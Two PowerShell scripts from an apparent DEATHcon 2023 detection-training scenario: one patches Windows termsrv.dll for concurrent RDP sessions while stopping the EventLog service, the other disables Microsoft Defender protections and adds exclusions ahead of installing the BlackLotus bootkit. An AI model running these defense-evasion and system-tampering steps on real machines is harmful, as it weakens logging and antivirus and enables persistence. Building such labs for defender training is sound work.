DEATHcon 2023

Patch-RDP.ps1

Function Patch-RDP {
    <#
    .SYNOPSIS
        Patch RDP to enable multiple RDP sessions on non RDP servers.

        Name: patch_rdp.ps1
        Version: 0.2
        Author: Matt Green - @mgreen27

    .DESCRIPTION
        Patch termsrv.dll to enable multiple RDP sessions on non RDP servers.
        
        This script will shutdown relevant services to sucessfully enable the 
        patch.

        This script patches the existing c:\windows\system32\termsrv.dll and
        will invalidate authenticode.

        A backup will be created at c:\windows\system32\termsrv.dll.backup

        There are several switches availible.
            -remove patch
            -TargetBytes: defaults to latest dll version, you can add in hex 
            values needed to patch additional versions.

        References:
            https://www.mysysadmintips.com/windows/clients/998-multiple-rdp-remote-desktop-sessions-in-windows-11

    #>

    Param(
        [Parameter(Mandatory=$false)] [Switch]$remove,
        [Parameter(Mandatory=$false)] $TargetBytes = '39 81 3C 06 00 00 0F 84 .. .. 0. 00'
    )


    if ( $TargetBytes.Length -eq 35 ) {
        Write-Host "`nPatch-RDP: Stopping relevant services"
        stop-service UmRdpService
        stop-service TermService
        stop-service EventLog -force

        $action = $null

        # take ownership and prep ACL
        $ACL_termsrv = get-acl c:\windows\system32\termsrv.dll

        $NEWACL_termsrv = get-acl $env:USERPROFILE
        Set-Acl c:\windows\system32\termsrv.dll $NEWACL_termsrv

        # We use termmgr.dll as this should have required ACL
        $ACL_termsrv = get-acl c:\windows\system32\termmgr.dll

         # Read DLL as byte-array in order to modify the bytes.
         $DLLBytes = get-content c:\windows\system32\termsrv.dll -raw -encoding byte   # PowerShell traditional version
         $DLLTxt = $DLLBytes.forEach('ToString', 'X2') -join ' '
         $Ispatched = Select-String -InputObject $DLLTxt -Pattern 'B8 00 01 00 00 89 81 38 06 00 00 90' -CaseSensitive -SimpleMatch
         #$Unpatched = Select-String -InputObject $DLLTxt -Pattern '39 81 3C 06 00 00 0F 84 A1 8F 01 00' -CaseSensitive -SimpleMatch

         if( $Ispatched ) {
            Write-Host "`ttermsrv.dll Patch found"

            if( $remove) {
                fc.exe /b c:\windows\system32\termsrv.dll.backup c:\windows\system32\termsrv.dll
                Write-Host "`tCheck backup different manually before proceeding or quit script"
                pause

                Copy-Item c:\windows\system32\termsrv.dll.backup c:\windows\system32\termsrv.dll -Force
                Remove-Item C:\windows\system32\termsrv.dll.backup -Force

                $action = "patch removed"
                # final step of correct ACL added in common flow at end of script
            }
            else{
                Write-Host "`tLooks like this machine is already patched. exiting"
                # can add appropriate manual unpatch steps here but update is easier....
            }
        }
        else{
            Write-Host "`ttermsrv.dll Patch not found"

            if( $remove) {
                Write-Host "`tNothing to do... exiting"
            }
            else{
                $DLLTxt_replaced = $DLLTxt -replace $TargetBytes, 'B8 00 01 00 00 89 81 38 06 00 00 90' # termsrv.dll 10.0.17763.1697
                [byte[]] $DLLBytes_replaced = -split $DLLTxt_replaced -replace '^', '0x'
                Set-Content c:\windows\system32\termsrv.dll.patched -encoding byte -Value $DLLBytes_replaced

                # create backup
                Copy-Item c:\windows\system32\termsrv.dll c:\windows\system32\termsrv.dll.backup -Force

                fc.exe /b c:\windows\system32\termsrv.dll.backup c:\windows\system32\termsrv.dll
                fc.exe /b c:\windows\system32\termsrv.dll.patched c:\windows\system32\termsrv.dll
                Write-Host "`tCheck backup matches and patch different manually or quit script"
                pause

                Copy-Item c:\windows\system32\termsrv.dll.patched c:\windows\system32\termsrv.dll -Force
                Remove-Item C:\windows\system32\termsrv.dll.patched -Force
                $action = "patch added"
            }
        }

        # readd expected acl/permission
        set-acl c:\windows\system32\termsrv.dll $ACL_termsrv

        Write-Host "`nPatch-RDP: Restarting services"

        start-service UmRdpService
        start-service TermService
        start-service EventLog

    
        if( $action) { 
            Write-Host "`nPatch-RDP: $action"
        }
        else{ 
            Write-Host "`nPatch-RDP: completed"
        }
    }
    else { 
        Write-Host "`nPatch-RDP: Exiting - TargetBytes incorrect length."
        Write-Host "`t`$TargetBytes entered - $TargetBytes"
        Write-Host "`t`Should be hex values as a string with wildcards accepted."
        Write-Host "`t`$TargetBytes default - 39 81 3C 06 00 00 0F 84 .. .. 0. 00"
    }
}

blacklotus_demo.ps1

# DEATHcon 2023: Velociraptor UEFI scenario

$payload_path = $env:HOMEDRIVE + $env:HOMEPATH + "/Desktop/51d65406058c4f173b736e3b90c8dbdfae6b2248fc2c4a089d61e49b2906f488.exe"

# Disable defender
Set-MpPreference -DisableBehaviorMonitoring $True -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -DisableRealtimeMonitoring $true -DisableArchiveScanning $true -DisableCatchupFullScan $true -DisableCatchupQuickScan $true -DisableRemovableDriveScanning $true -DisableRestorePoint $true -DisableScanningMappedNetworkDrivesForFullScan $true -DisableBlockAtFirstSeen $true -DisableGradualRelease $true -DisableRdpParsing $True
Add-MpPreference -ExclusionPath $payload_path -ExclusionProcess $payload_path -ExclusionExtension "exe,dll,efi,ps1"

# install BlackLotus